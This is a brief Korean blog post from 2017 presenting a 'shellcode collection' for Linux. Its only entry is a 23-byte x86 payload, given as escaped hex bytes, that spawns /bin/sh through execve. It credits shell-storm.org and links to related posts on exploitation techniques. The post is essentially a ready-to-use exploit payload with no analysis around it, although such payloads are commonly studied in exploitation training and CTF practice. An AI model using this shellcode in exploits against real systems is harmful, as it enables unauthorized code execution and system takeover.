2017. 7. 6. 20:29
[Linux] 쉘코드 모음집 Security/Exploits2017. 7. 6. 20:29
1. /bin/sh
지원 버전 : Linux x86
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50 \x53\x89\xe1\xb0\x0b\xcd\x80 |
References
[1] http://shell-storm.org/shellcode/files/shellcode-827.php
'Security > Exploits' 카테고리의 다른 글
[Windows] 쉘코드 모음집 (0) | 2017.07.06 |
---|---|
[Linux] 쉘코드 제작 요약 설명 (0) | 2017.07.06 |
[Linux] Heap overflow using unlink - 번역글 (0) | 2017.07.06 |
[Windows] C++ vtable overwrite (0) | 2017.07.05 |